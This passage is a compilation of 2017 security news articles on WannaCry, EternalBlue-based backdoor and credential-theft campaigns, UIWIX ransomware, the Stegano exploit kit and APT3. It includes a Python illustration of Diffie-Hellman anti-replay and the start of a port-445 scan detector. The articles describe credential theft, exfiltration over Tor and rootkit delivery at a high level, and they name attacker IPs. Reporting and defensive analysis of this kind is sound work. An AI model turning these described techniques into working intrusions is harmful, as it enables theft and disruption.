The malware attempts to delete a number of users and to terminate and/or delete various files or processes, and a memory dump reveals that it is connected to a remote access tool hosted on a Chinese website, ForShare 8.28.

The RAT can receive and execute commands from the server, monitor the screen, capture audio and video, monitor the keyboard, transfer data, delete files, terminate processes, execute files, enumerate files and processes, download files, and control the machine.

Because the threat closes port 445, Cyphort believes the actor was aware of the EternalBlue vulnerability and was attempting to keep other malware out of the vulnerable machines.

“We believe that the group behind this attack is the same group that spreads Mirai via Windows Kaspersky discovered in February. We found similarities in terms of their IOCs,” the security researchers say.

In a report this week, Secdo also claims to have found evidence of malware abusing EternalBlue weeks before WannaCry emerged. One of the malicious programs appears to be a ransomware family that also steals user credentials.

The researchers describe it as a “new evasive attack that leaves no trace and has been infecting organizations using NSA exploits since the mid-April.” “The ransomware is the most apparent payload, yet under the surface a more sophisticated attack occurred that would have gone unnoticed.”

As part of this attack, the researchers say, actors used an EternalBlue-based worm to infect all machines in a compromised network, and also deployed a backdoor for persistence or exfiltrated login credentials.

One of the attacks originated from a Russian IP (77.72.84.11). Using the NSA-linked exploit for compromise, attackers spawned a thread inside a legitimate application, and used it to download multiple modules, including an SQLite DLL from SourceForge to steal login credentials from Firefox.

Stolen data is exfiltrated through the TOR network, after which “a ransomware variant of CRY128 that runs purely in-memory encrypts all the documents on the system,” the researchers say.

The recently discovered UIWIX ransomware that spreads via the EternalBlue exploit is also being executed only in memory, resulting in a fileless infection. UIWIX also contains code meant to steal a broad range of login credentials.

Another attack was linked to a Chinese actor and involved the distribution of a backdoor. The attack starts with process injection, similar to the above, but ends with the download of a known rootkit backdoor (based on Agony). The downloaded file, 666.exe, is blocked by antivirus programs.

“Based on these findings, we suspect that the scope of the damage is much greater than previously thought, and that there are at least 3 different groups that have been leveraging the NSA exploit to infect enterprise networks since late April,” Secdo notes.

In January, the United States Computer Emergency Readiness Team (US-CERT) issued an alert after Shadow Brokers revealed they had a zero-day exploit targeting SMB up for sale. In February, a Windows SMBv3 zero-day vulnerability (CVE-2017-0016) was assessed with a High severity rating, after initially being believed to be Critical.


North Korea Denies Role in Global Cyberattack

22.5.2017 securityweek Cyber
North Korea on Friday angrily dismissed reports linking its isolated regime to the global cyberattack that held thousands of computers to virtual ransom.

Up to 300,000 computers in 150 countries were hit by the WannaCry worm, which seizes systems and demands payment in Bitcoin to return control to users.

The code used in the latest attack is similar to that used in past hacks blamed on Kim Jong-Un's regime, leading some to point the finger at Pyongyang.

But the North has now denied the claims, notably but not exclusively advanced by South Korean experts, and hit back Friday to accuse its opponents of spreading propaganda.

"It is ridiculous," Kim In-Ryong, North Korea's deputy ambassador to the United Nations, told reporters, suggesting Washington and Seoul were behind the allegation.

"Whenever something strange happens, it is the stereotyped way of the United States and the hostile forces to kick off a noisy anti-DPRK campaign."


Seoul internet security firm Hauri, known for its vast troves of data on Pyongyang's hacking activities, has been warning of ransomware attacks since last year.

The firm's Simon Choi told AFP that the WannaCry malware shares code with tools used to target Sony Pictures and Bangladesh, in previous attacks blamed on the North.

Researchers in the US, Russia and Israel have also pointed to a potential North Korean link -- but it is notoriously hard to attribute cyberattacks.

Google researcher Neel Mehta has shown similarities between WannaCry and code used by the Lazarus hacking group, widely believed to be connected to Pyongyang.


China Killed or Jailed Up to 20 US Spies in 2010-12: Report

22.5.2017 securityweek CyberSpy
Beijing systematically dismantled CIA spying efforts in China beginning in 2010, killing or jailing more than a dozen covert sources, in a deep setback to US intelligence there, The New York Times reported Sunday.

The Times, quoting 10 current and former American officials who spoke on condition of anonymity, described the intelligence breach as one of the worst in decades.

It said that even now intelligence officials are unsure whether the US was betrayed by a mole within the CIA or whether the Chinese hacked a covert system used by the CIA to communicate with foreign sources.

Of the damage inflicted on what had been one of the most productive US spy networks, however, there was no doubt: at least a dozen CIA sources were killed between late 2010 and the end of 2012, including one who was shot in front of colleagues in a clear warning to anyone else who might be spying, the Times reported.

In all, 18 to 20 CIA sources in China were either killed or imprisoned, according to two former senior American officials quoted. It was a grave setback to a network that, up to then, had been working at its highest level in years.

Those losses were comparable to the number of US assets lost in the Soviet Union and Russia because of the betrayals of two infamous spies, Aldrich Ames and Robert Hanssen, the report said.

Western espionage services have traditionally found it exceptionally hard to develop spy networks in China and Russia.

The CIA's mole hunt in China, following the severe losses to its network there, was intense and urgent. Nearly every employee of the US Embassy in Beijing was scrutinized at one point, the newspaper said.

Meantime, then-president Barack Obama's administration was demanding to know why its flow of intelligence from China had slowed.

The revelations come as the CIA seeks to determine how some of its highly sensitive documents were released two months ago by WikiLeaks, and the FBI examines possible links between the Donald Trump campaign and Russia.

Both the CIA and the FBI declined to comment.


Medical Devices infected by WannaCry Ransomware in US hospitals
21.5.2017 securityaffairs Ransomware

According to Forbes, the dreaded WannaCry ransomware has infected medical devices in at least two hospitals in the United States.
WannaCry infected 200,000 computers across 150 countries in a matter of hours last week. It took advantage of a tool named “Eternal Blue”, originally created by the NSA, which exploited a vulnerability present in earlier versions of Microsoft Windows. This tool was stolen by a hacking group named “Shadow Brokers”, which leaked it to the world in April 2017.

Now security experts report that the WannaCry ransomware has also infected medical devices, as reported by Thomas Fox-Brewster on Forbes.

The journalist published an image of an infected medical device, likely Bayer Medrad radiology equipment used to inject contrast agents into the human body to aid MRI scans.

“A source in the healthcare industry passed Forbes an image of an infected Bayer Medrad device in a U.S. hospital. The source did not say which specific hospital was affected, nor could they confirm what Bayer model was hacked. But it appears to be radiology equipment designed to help improve imaging.” states Forbes. “More specifically, it’s a device used for monitoring what’s known in the industry as a “power injector,” which helps deliver a “contrast agent” to a patient. Such agents consist of chemicals that improve the quality of magnetic resonance imaging (MRI) scans.”

WannaCry ransomware on a Bayer radiology system – Source Forbes

The medical device was infected by the WannaCry ransomware because it was running a version of the Windows Embedded operating system with support for the SMBv1 protocol.

The name of the hospital where the device was infected was not disclosed to Forbes; Bayer confirmed it had received two reports from customers in the US.

According to a Bayer spokesperson, the affected hospitals faced limited problems.

“Operations at both sites were restored within 24 hours,” said the spokesperson. “If a hospital’s network is compromised, this may affect Bayer’s Windows-based devices connected to that network.”

Bayer plans to send out a Microsoft patch for its Windows-based devices “soon.”

According to Forbes, a source with the Health Information Trust Alliance (HITRUST) confirmed that WannaCry ransomware also infected and locked down Windows-based medical devices belonging to Siemens.

Siemens admitted that Healthineers products are vulnerable to WannaCry.

“Siemens Healthineers recognizes that some of its customers may be facing impacts from the recent major cyber-attack known as “WannaCry”.” reads the advisory published by Siemens. “Select Siemens Healthineers products may be affected by the Microsoft vulnerability being exploited by the WannaCry ransomware. The exploitability of any such vulnerability depends on the actual configuration and deployment environment of each product.”

Ransomware is a serious threat to the healthcare industry: this category of malware can infect systems at hospitals, preventing personnel from using medical equipment and disrupting ordinary operations such as managing patient data or treatment schedules.

WannaCry affected 40 hospitals in the UK. Let’s hope operators in the healthcare industry understand the importance of cyber security for the sector.


Stegano Exploit Kit now uses the Diffie-Hellman Algorithm
21.5.2017 securityaffairs Exploit

The Stegano exploit kit, also known as Astrum, continues to evolve: its authors recently adopted the Diffie-Hellman algorithm to hinder analysis.
The Stegano exploit kit was associated in the past with a massive AdGholas malvertising campaign that delivered malware, mostly the Gozi and RAMNIT trojans. Experts at Trend Micro also observed the exploit kit in the Seamless malvertising campaign.

“Astrum’s recent activities feature several upgrades and show how it’s starting to move away from the more established malware mentioned above. It appears these changes were done to lay the groundwork for future campaigns, and possibly to broaden its use. With a modus operandi that deters analysis and forensics by abusing the Diffie-Hellman key exchange, it appears Astrum is throwing down the gauntlet.” reads the analysis published by Trend Micro.


In March, the French researcher Kafeine reported the Stegano EK exploiting the information disclosure vulnerability tracked as CVE-2017-0022. The attackers exploited the flaw to evade antivirus detection and analysis.

A month later, the Stegano exploit kit was updated to prevent security researchers from replaying the malicious network traffic.

“We found that this anti-replay feature was designed to abuse the Diffie-Hellman key exchange—a widely used algorithm for encrypting and securing network protocols. Angler was first observed doing this back in 2015.” continues the analysis.

“Implementing the Diffie-Hellman key exchange prevents malware analysts and security researchers from getting a hold of the secret key Astrum uses to encrypt and decrypt their payloads. Consequently, obtaining the original payload by solely capturing its network traffic can be very difficult.”
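Why a packet capture alone is not enough, as an added Python illustration (not Astrum's code and not Trend Micro's): a toy session run the way a network tap sees it, using the public RFC 2409 1024-bit MODP group and a toy keystream cipher that merely stands in for whatever the kit actually uses. Every value on the wire is public, and decryption needs a private exponent that never leaves the victim side, which is why analysts end up instrumenting the client rather than replaying traffic.

```python
import hashlib
import secrets

# Public 1024-bit MODP prime from RFC 2409 (group 2) with generator 2. It is
# used here only because it is a well-known public group; nothing about the
# real exploit kit's parameters or wire format is assumed.
P = int(
    "FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD1"
    "29024E088A67CC74020BBEA63B139B22514A08798E3404DD"
    "EF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245"
    "E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED"
    "EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381"
    "FFFFFFFFFFFFFFFF", 16)
G = 2


def dh_keypair():
    """Fresh private exponent x and the public value g^x mod p sent on the wire."""
    priv = secrets.randbelow(P - 2) + 1
    return priv, pow(G, priv, P)


def derive_key(peer_pub, own_priv):
    """Shared secret peer_pub^own_priv mod p, hashed to a 32-byte session key."""
    shared = pow(peer_pub, own_priv, P)
    return hashlib.sha256(shared.to_bytes(128, "big")).digest()


def xor_stream(key, data):
    """Toy keystream cipher: XOR with SHA-256(key || block counter).

    Symmetric, so the same call encrypts and decrypts. It stands in for the
    payload encryption only; do not treat it as a real cipher."""
    out = bytearray()
    for i in range(0, len(data), 32):
        block = hashlib.sha256(key + (i // 32).to_bytes(4, "big")).digest()
        out.extend(c ^ k for c, k in zip(data[i:i + 32], block))
    return bytes(out)


def run_session(payload):
    """One client/server exchange.

    Returns what a passive tap records (p, g, both public values and the
    ciphertext) and, separately, the client's private exponent, which is
    never transmitted."""
    client_priv, client_pub = dh_keypair()
    server_priv, server_pub = dh_keypair()
    key = derive_key(client_pub, server_priv)   # server side of the exchange
    capture = {
        "p": P,
        "g": G,
        "client_pub": client_pub,
        "server_pub": server_pub,
        "ciphertext": xor_stream(key, payload),
    }
    return capture, client_priv


def replay_to_fresh_server(capture, payload):
    """An analyst replays the recorded client public value to a new server.

    The server draws a fresh exponent, so the session key differs from the
    recorded one; without a private exponent the analyst still cannot decrypt
    either ciphertext. Returns (new_ciphertext, same_as_recorded)."""
    server_priv, _server_pub = dh_keypair()
    key = derive_key(capture["client_pub"], server_priv)
    new_ct = xor_stream(key, payload)
    return new_ct, new_ct == capture["ciphertext"]


def decrypt_with_client_private(capture, client_priv):
    """Decryption works once the client's private exponent is available.

    In practice that means instrumenting the victim-side process (hooking the
    browser or dumping its memory) rather than relying on the pcap."""
    key = derive_key(capture["server_pub"], client_priv)
    return xor_stream(key, capture["ciphertext"])


if __name__ == "__main__":
    sample = b"constructed sample payload"   # constructed, not a real payload
    cap, priv = run_session(sample)
    print("decrypts with client private exponent:",
          decrypt_with_client_private(cap, priv) == sample)
    _, same = replay_to_fresh_server(cap, sample)
    print("replayed session reproduces recorded ciphertext:", same)
```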

According to the experts, the Astrum/Stegano exploit kit includes exploit code for a number of vulnerabilities in Adobe Flash, including the CVE-2015-8651 RCE, the CVE-2016-1019 RCE, and the out-of-bounds read flaw tracked as CVE-2016-4117.

Experts highlighted that the Stegano exploit kit is currently not being used to deliver malware and its associated traffic is very low; both circumstances suggest that a spike in its activity could be observed soon.

“It wouldn’t be a surprise if [Astrum/Stegano’s] operators turn it into an exclusive tool of the trade—like Magnitude and Neutrino did—or go beyond leveraging security flaws in Adobe Flash. Emulating capabilities from its predecessors such as fileless infections that can fingerprint its targets and deliver encrypted payloads shouldn’t be far off,” concluded Trend Micro.


Researchers found a link between the APT3 Threat Group and the Chinese Intelligence Agency
21.5.2017 securityaffairs  APT

Security experts at threat intelligence firm Recorded Future have found a clear link between the APT3 cyber threat group and China’s Ministry of State Security.
The curtain has been pulled back a little on the Chinese Intelligence Agency intelligence gathering structure — and it includes private security contractors and the network vendor supply chain.

In 2010, security vendor FireEye identified the Pirpi Remote Access Trojan (RAT) which exploited a then 0-day vulnerability in Internet Explorer versions 6, 7 and 8. FireEye named the threat group APT3 which has also been described as TG-0100, Buckeye, Gothic Panda, and UPS and described them as “one of the most sophisticated threat groups” being tracked at the time.

Since then, APT3 has been actively penetrating corporations and governments in the US, UK and most recently Hong Kong — and everyone has been trying to figure out who they are. APT3 functions very differently from 3PLA, the former Chinese military hacking organization, leading to the assumption that APT3 is not part of the military complex. At least not officially.

On May 9th, 2017, an unknown party using the alias ‘intrusiontruth’ published a series of blog posts describing connections between the Pirpi RAT command and control components and shareholders of the Chinese security contractor Guangzhou Boyu Information Technology Company, aka Boyusec.

“On May 9, a mysterious group calling itself “intrusiontruth” identified a contractor for the Chinese Ministry of State Security (MSS) as the group behind the APT3 cyber intrusions.” states the analysis published by Recorded Future.

The names of two specific shareholders of Boyusec appear in the domain registration for the Pirpi C&C servers. This is particularly interesting because Boyusec supports the Chinese Ministry of State Security (MSS) by collecting civilian human intelligence. Think of them as an outsourcer for a government agency like the United States’ National Security Agency (NSA).

Also interesting is that in 2016 a Pentagon report described the relationship between Boyusec and network equipment manufacturer, Huawei. According to the report, the two companies were colluding to develop security equipment with embedded backdoors which would likely be used by Boyusec to compromise Huawei customers.

“In November 2016, the Washington Free Beacon reported that a Pentagon internal intelligence report had exposed a product that Boyusec and Huawei were jointly producing.” continues the analysis. “According to the Pentagon’s report, the two companies were working together to produce security products, likely containing a backdoor, that would allow Chinese intelligence “to capture data and control computer and telecommunications equipment.” The article quotes government officials and analysts stating that Boyusec and the MSS are “closely connected,” and that Boyusec appears to be a cover company for the MSS.”

To protect our networks, it is important to assess the threats. An important part of threat assessment is to anticipate the motivation of the attackers. APT3 has demonstrated above average skills and has been active for a long time. Add ties to the network vendor supply chain and you have the makings of a dangerous adversary. As part of the Chinese MSS structure you can start to guess at motivation. With this new information, it is a good time to reassess your threat model.


“The implications are clear and expansive. Recorded Future’s research leads us to attribute APT3 to the Chinese Ministry of State Security and Boyusec with a high degree of confidence. Boyusec has a documented history of producing malicious technology and working with the Chinese intelligence services.” concludes the analysis.


Google Adds New Behavior-Based Malware Scanner To Every Android Device
20.5.2017 thehackernews Android
In order to keep its billions of users safe, Google has introduced another security defense for its Android devices, called Google Play Protect.
Google Play Protect, which is part of the Google Play Store app, uses machine learning and app usage analysis to weed out dangerous and malicious apps, which have always been an albatross around the tech giant's neck.
Since Google Play Protect actually comes with the Google Play Store, users do not need to install or activate this security feature separately.
Google Play Protect for Android devices consists of:
App scanning
Anti-Theft Measures
Browser Protection
Play Protect's App Scanning Feature
Google Play Protect is an always-on service on devices which is said to scan 50 billion apps each day across a billion Android devices to ensure they are safe.
Google already has a number of security measures in place to help keep your smartphones safe, including Verify Apps and its Bouncer service, but once apps are uploaded to the Play Store and installed on your device, Google does not have anything in place to monitor the behavior of those apps – something that most malware apps were abusing.
Running automatically in the background, Google Play Protect is built into devices and will not only analyse apps before they appear on the Play Store, but also monitor them once installed on the device, including apps that have been installed from third-party stores.
For this, Google makes use of machine learning algorithms that automatically compare app behavior and single out apps acting abnormally; if it encounters a malicious app, it warns you or even disables the app to prevent further harm.
Google says it works around the clock to keep up with the latest threats
Google says the new machine learning system regularly updates to help the Android ecosystem stay one step ahead of any potential threats by always looking out for "new risks, identifying potentially harmful apps and keeping them off your device or removing them."
Play Protect's Anti-Theft Measures
With the introduction of Google Play Protect, Android Device Manager has been replaced with Find My Device, which is used to locate lost and misplaced devices.
You can use a browser or any other device to remotely call, locate, and lock your Android device, or even erase its data to protect sensitive information.
Find My Device is the same old solution, but Google included it into the Google Play Protect program.
Play Protect's Browser Protection
With the Safe Browsing feature in Chrome, Play Protect lets users stay safe while browsing the Internet.
Usually, viruses, malware and worms land on your smartphones and computers via malicious websites. So, if you visit any website that is acting suspiciously, the Safe Browsing feature will warn you and block websites that seem sketchy or unsafe.
Google Play Protect service will be rolling out to Android devices over the coming weeks.


More Hacking Groups Found Exploiting SMB Flaw Weeks Before WannaCry
20.5.2017 thehackernews BigBrothers

Since the Shadow Brokers released the zero-day software vulnerabilities and hacking tools – allegedly belonging to the NSA's elite hacking team Equation Group – several hacking groups and individual hackers have started using them in their own way.
April's data dump was believed to be the most damaging release by the Shadow Brokers to date, as it publicly leaked lots of Windows hacking tools, including a dangerous Windows SMB exploit.
After the outbreak of WannaCry last week, security researchers have identified multiple different campaigns exploiting Windows SMB vulnerability (CVE-2017-0143), called Eternalblue, which has already compromised hundreds of thousands of computers worldwide.
It has even been confirmed to me by multiple sources in the hacking and intelligence community that there are lots of groups and individuals actively exploiting Eternalblue for different motives.
Moreover, the Eternalblue SMB exploit (MS17-010) has now been ported to Metasploit, a penetration testing framework that enables researchers as well as hackers to exploit this vulnerability easily.
Cybersecurity startup Secdo, an incident response platform, has recently discovered two separate hacking campaigns using the same Eternalblue SMB exploit at least three weeks before the outbreak of WannaCry global ransomware attacks.
So, it would not be surprising to find more hacking groups, state-sponsored attackers, financially motivated organized criminal gangs and gray hat hackers exploiting Eternalblue to target large organizations and individuals.

The two newly discovered hacking campaigns, one traced back to Russia and another to China, are much more advanced than WannaCry, as sophisticated hackers are leveraging Eternalblue to install backdoors, Botnet malware and exfiltrate user credentials.
According to Secdo, these attacks might pose a much bigger risk than WannaCry, because even if companies block WannaCry and patch the SMB Windows flaw, "a backdoor may persist and compromised credentials may be used to regain access" to the affected systems.
Both campaigns use a similar attack flow: attackers initially infect the target machine with malware via different attack vectors, then use Eternalblue to infect other devices in the same network, and finally inject a stealthy thread into legitimate applications, which is then used to achieve persistence by either deploying a backdoor or exfiltrating login credentials.
Russian Campaign: Credential-Theft Attacks

Secdo discovered that attackers are injecting a malicious thread into the 'lsass.exe' process using Eternalblue.
Once infected, the thread begins downloading multiple malicious modules and then accesses the SQLite DLL to retrieve users' saved login credentials from Mozilla's Firefox browser.
The stolen credentials are then sent to the attacker's command-and-control server via the encrypted Tor network in order to hide the real location of the C&C server.
Once sent, a ransomware variant of CRY128, which is a member of the infamous Crypton ransomware family, starts running in the memory and encrypts all the documents on the affected system.
According to Secdo, "at least 5 of the most popular Next Gen AV vendors and Anti-Malware vendors were running on the endpoints and were unable to detect and stop this attack. This is most likely due to the thread only nature of the attack."
This attack has been traced back to late April, three weeks prior to the WannaCry outbreak. The attack originates from a Russia-based IP address (77.72.84.11), but that doesn't mean the hackers are Russian.
Chinese Campaign: Installs Rootkit and DDoS Botnet

This campaign was also seen in late April.
Using Eternalblue, a malicious thread is spawned inside of the lsass.exe process, similar to the above-mentioned credential theft attack.
But instead of remaining purely in-memory, the initial payload then connects back to a Chinese command-and-control server on port 998 (117.21.191.69) and downloads a known rootkit backdoor, based on the ‘Agony rootkit’, to achieve persistence.
Once installed, the payload installs a Chinese Botnet malware, equipped with DDoS attack functionality, on the affected machine.
"These attacks demonstrate that many endpoints may still be compromised despite having installed the latest security patch," Secdo concluded.
"We highly recommend using a solution that has the ability to record events at the thread level in order to hunt, mitigate and assess potential damage as soon as possible."
These malicious campaigns went unnoticed for weeks because, unlike WannaCry, the purpose of these attacks was different: holding affected systems for a long time by achieving persistence and stealing credentials to regain access.
A recent example is "Adylkuzz," a stealthy cryptocurrency-mining malware that was also using the Windows SMB vulnerability at least two weeks before the outbreak of the WannaCry ransomware attacks.
These attacks are just the beginning, as attacks like WannaCry have not been completely stopped and given the broad impact of the NSA exploits, hackers and cyber criminals are curiously waiting for the next Shadow Brokers release, which promised to leak more zero-days and exploits from next month.
Since the attackers are currently waiting for new zero-days to exploit, there is very little users can do to protect themselves from the upcoming cyber attacks.
You can follow some basic security tips that I have mentioned in my previous article about how to disable SMB and prevent your devices from getting hacked.


WannaCry Does Not Fit North Korea's Style, Interests: Experts

20.5.2017 securityweek Ransomware
Some experts believe that, despite malware code similarities, the WannaCry ransomware is unlikely to be the work of North Korea, as the attack does not fit the country’s style and interests.

The WannaCry ransomware, also known as Wanna Decryptor, WanaCrypt0r, WannaCrypt, Wana Decrypt0r and WCry, has hit hundreds of thousands of systems worldwide, including ones housed by banks, hospitals, ISPs, government agencies, transportation companies and manufacturing plants.

The first clue that the WannaCry ransomware may have been created by North Korea was uncovered by Google researcher Neel Mehta. The expert noticed that a variant of WannaCry making the rounds in February, when the threat was less known, had code similarities with a tool used by the North Korea-linked cyber espionage group named Lazarus. The code in question was removed from later versions of the ransomware.

Security firms such as Symantec and Kaspersky confirmed the connection to Lazarus, and Kaspersky said it was “improbable” that this was a false flag. Even the Shadow Brokers, the group that leaked the Equation Group exploits leveraged by WannaCry, attributed the attack to North Korea.

However, not everyone agrees that North Korea is behind WannaCry. The threat intelligence team at endpoint security firm Cybereason believes North Korea is unlikely to be behind the campaign.

“Nothing in North Korea’s past cyber campaigns or in their conventional military and foreign policy fit this mold. Looking at national identity, foreign policy and strategic messaging will greatly reduce the likelihood that Pyongyang ordered this campaign,” the company said in a blog post on Friday.

Related: Industry Reactions to WannaCry Ransomware Attacks

One reason is that North Korea, guided by its self-reliance ideology, has never used commodity malware or generic tools in its cyberattacks. All the tools and exploits leveraged by the Lazarus group have been custom-built, Cybereason said.

Another reason for which North Korea is unlikely to be behind the WannaCry ransomware attack is the fact that China and Russia, two of the country’s biggest allies, were among the most affected. Furthermore, some of Pyongyang’s biggest enemies, including the U.S., Japan and South Korea, had fairly low infection rates.

The Lazarus group has been linked to several high-profile operations, including the 2014 attack on Sony Pictures, the 2016 attack on Bangladesh’s central bank, which resulted in the theft of $81 million, and some more recent campaigns targeting financial institutions. While North Korea has never officially taken responsibility for these attacks, Cybereason pointed out that the country has always left clear hints of its involvement as a way of sending a strategic message.

Since Lazarus has been linked to several profit-driven attacks, there is a possibility that the WannaCry attacks had a similar goal. However, experts believe that if North Korea was behind the campaign and the goal was to make money, it would have likely set up a better payment system, it wouldn’t have bothered removing the Lazarus code from the final version of WannaCry, and it wouldn’t have neglected to register the kill switch domain that allowed researchers to disrupt the campaign.

Cybereason is not the only company that is skeptical of North Korea’s involvement in the WannaCry attack. Bogdan Botezatu, senior e-threat specialist at Bitdefender, also believes that the scenario in which a state-sponsored actor – especially one as sophisticated as Lazarus – would switch to ransomware is unlikely.

“The attack wasn't targeted and there was no clear gain for them,” Botezatu told SecurityWeek. “It's doubtful they would use such a powerful exploit for anything else than espionage.”

The expert pointed out that Bitdefender took WannaCry apart and found only the worm module and the ransomware component – nothing to indicate that the malware could be used for anything else.


Stealth Backdoor Abused NSA Exploit Before WannaCrypt

20.5.2017 securityweek Ransomware
In the aftermath of the WannaCry ransomware outbreak, security researchers discovered numerous attacks that have been abusing the same EternalBlue exploit for malware delivery over the past several weeks.

Targeting a Server Message Block (SMB) vulnerability on TCP port 445, the exploit was made public in April by the group of hackers calling themselves “The Shadow Brokers” and is said to have been stolen from the National Security Agency-linked Equation Group. The targeted flaw was patched in March.

The fast spreading WannaCry brought EternalBlue to everyone’s attention, yet other malware families have been using it for infection long before the ransomware started using it. One of them was the Adylkuzz botnet, active since April 24, researchers revealed.

Now, Cyphort says that evidence on a honeypot server suggests attacks on SMB were active in early May, and they were dropping a stealth Remote Access Trojan (RAT) instead of ransomware. The malware didn’t have the worm component and didn’t spread like WannaCry.

The malware appears to have been distributed from an IP (182.18.23.38) located in China. Following successful exploitation, an encrypted payload is sent as a shellcode, and the security researchers found a DLL embedded in the shellcode, which they say “is basically a Trojan which downloads additional malware and receives commands from its controller.”

One of the files downloaded by this malware is meant to close port 445, thus preventing other malware from abusing the same flaw. Another file is believed to be a second-stage payload. The RAT sets a series of Registry Run entries to download and execute additional malware, the researchers say.

The malware attempts to delete a number of users and terminate and/or delete various files or processes and a memory dump reveals that it is connected to a remote access tool hosted on a Chinese website, ForShare 8.28.

The RAT can receive and execute commands from server, monitor the screen, capture audio and video, monitor the keyboard, transfer data, delete files, terminate processes, execute files, enumerate files and processes, download files, and control the machine.

Because the threat closes port 445, Cyphort believes the actor was aware of the EternalBlue vulnerability and was attempting to keep other malware out of the vulnerable machines.

“We believe that the group behind this attack is the same group that spreads Mirai via Windows Kaspersky discovered in February. We found similarities in terms of their IOCs,” the security researchers say.

In a report this week, Secdo also claims to have found evidence of malware abusing EternalBlue weeks before WannaCry emerged. One of the malicious programs appears to be a ransomware family that also steals user credentials.

The researchers describe it as a “new evasive attack that leaves no trace and has been infecting organizations using NSA exploits since the mid-April.” “The ransomware is the most apparent payload, yet under the surface a more sophisticated attack occurred that would have gone unnoticed,” they add.

As part of this attack, the researchers say, actors were using an EternalBlue-based worm to infect all machines in a compromised network, and were also deploying a backdoor for persistence, or exfiltrated login credentials.

One of the attacks originated from a Russian IP (77.72.84.11). Using the NSA-linked exploit for compromise, attackers spawned a thread inside a legitimate application, and used it to download multiple modules, including SQLite DLL from SourceForge to steal login credentials from Firefox.

Stolen data is exfiltrated through the TOR network, after which “a ransomware variant of CRY128 that runs purely in-memory encrypts all the documents on the system,” the researchers say.

The recently discovered UIWIX ransomware that spreads via the EternalBlue exploit is also being executed only in memory, resulting in a fileless infection. UIWIX also contains code meant to steal a broad range of login credentials.

Another attack was linked to a Chinese actor and involved the distribution of a backdoor. The attack starts with process injection, similar to the above, but ends with the download of a known root-kit backdoor (based on Agony). The downloaded file, 666.exe, is blocked by antivirus programs.

“Based on these findings, we suspect that the scope of the damage is much greater than previously thought, and that there are at least 3 different groups that have been leveraging the NSA exploit to infect enterprise networks since late April,” Secdo notes.

In January, the United States Computer Emergency Readiness Team (US-CERT) issued an alert after the Shadow Brokers revealed they had a zero-day exploit targeting SMB up for sale. In February, a Windows SMBv3 zero-day vulnerability (CVE-2017-0016) was assessed with a High severity rating, after initially being believed to be Critical.


UIWIX, the Fileless Ransomware that leverages NSA EternalBlue Exploit to spread
20.5.2017 securityaffairs BigBrothers
Security experts discovered a new ransomware family, dubbed UIWIX, that uses the NSA-linked EternalBlue exploit for distribution
The effects of the militarization of cyberspace are dangerous and unpredictable. Malicious code developed by a government can create serious problems for Internet users, as demonstrated by the recent massive WannaCry attack, which used the EternalBlue exploit to spread.

Now a new ransomware, dubbed UIWIX, was discovered to be using the NSA-linked EternalBlue exploit for distribution.

UIWIX is a fileless malware discovered by experts at Heimdal Security early this week while investigating WannaCry.

Like WannaCry, UIWIX exploits the same vulnerability in the Windows SMB protocol, but the new threat is able to run in the memory of the infected system after exploiting EternalBlue.

“As we feared in yesterday’s alert, another ransomware variant, known as Uiwix, has been spotted in the wild, exploiting the same vulnerability in Windows SMBv1 and SMBv2 as WannaCry used. Cyber criminals are quick to incorporate vulnerabilities, especially when they have the potential to infect a large number of targets like the EternalBlue exploit has.” reads the analysis published by Heimdal Security.

Malware researchers at Trend Micro also investigated UIWIX and confirmed that it is a stealthier threat that is hard to analyze: it doesn’t write files to the infected machine and it is also able to detect the presence of a virtual machine (VM) or sandbox.

“So how is UIWIX different? It appears to be fileless: UIWIX is executed in memory after exploiting EternalBlue. Fileless infections don’t entail writing actual files/components to the computer’s disks, which greatly reduces its footprint and in turn makes detection trickier.” wrote Trend Micro.

“UIWIX is also stealthier, opting to terminate itself if it detects the presence of a virtual machine (VM) or sandbox. Based on UIWIX’s code strings, it appears to have routines capable of gathering the infected system’s browser login, File Transfer Protocol (FTP), email, and messenger credentials.”

UIWIX is able to gather browser login, File Transfer Protocol (FTP), email, and messenger credentials from the infected system.

Unlike WannaCry, UIWIX leverages a Dynamic-link Library (DLL) to gain persistence.

Below is a summary of WannaCry's and UIWIX's notable features, as reported by Trend Micro:

Attack vectors
  WannaCry: SMB vulnerabilities (MS17-010), TCP port 445
  UIWIX: SMB vulnerabilities (MS17-010), TCP port 445
File type
  WannaCry: Executable (EXE)
  UIWIX: Dynamic-link Library (DLL)
Appended extension
  WannaCry: {original filename}.WNCRY
  UIWIX: ._{unique id}.UIWIX
Autostart and persistence mechanisms
  WannaCry: Registry
  UIWIX: None
Anti-VM, VM check, or anti-sandbox routines
  WannaCry: None
  UIWIX: Checks presence of VM and sandbox-related files or folders
Network activity
  WannaCry: On the internet, scans for random IP addresses to check if it has an open port 445; connects to .onion site using Tor browser
  UIWIX: Uses mini-tor.dll to connect to .onion site
Exceptions (doesn't execute if it detects certain system components)
  WannaCry: None
  UIWIX: Terminates itself if found running in Russia, Kazakhstan, and Belarus
Exclusions (directories or file types it doesn't encrypt)
  WannaCry: Avoids encrypting files in certain directories
  UIWIX: Avoids encrypting files in two directories, and files with certain strings in their file name
Network scanning and propagation
  WannaCry: Yes (worm-like propagation)
  UIWIX: No
Kill switch
  WannaCry: Yes
  UIWIX: No
Number of targeted file types
  WannaCry: 176
  UIWIX: All files in the affected system except those in its exclusion list
Shadow copies deletion
  WannaCry: Yes
  UIWIX: No
Languages supported (ransom notes, payment site)
  WannaCry: Multilingual (27)
  UIWIX: English only

Another interesting behavior observed by the researchers is that the malware terminates itself if the compromised computer is located in Russia, Kazakhstan, and Belarus.

For network activity, the malware uses mini-tor.dll to connect to a .onion site, whereas WannaCry scanned the Internet for random IP addresses to check whether port 445 was open and connected to a .onion site using the Tor browser.
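The worm-like propagation attributed to WannaCry above, random scanning for hosts with TCP port 445 open, is the behaviour a network defender can look for in flow or firewall logs. The following Python script is an added example, not code from Trend Micro, Heimdal or the article's author: it parses a constructed set of flow records (timestamp, source, destination, destination port; the record format is an assumption made here) and flags any source that reaches an unusually large number of distinct hosts on port 445 within a short sliding window. The thresholds (20 distinct targets within 60 seconds) are also assumptions chosen for illustration and would be tuned to the network's normal SMB fan-out.

```python
"""Flag hosts whose outbound TCP/445 traffic looks like worm-style SMB scanning.

Added example for this article (not code from Trend Micro, Heimdal or the
author). The flow-record format and the thresholds are assumptions.
"""
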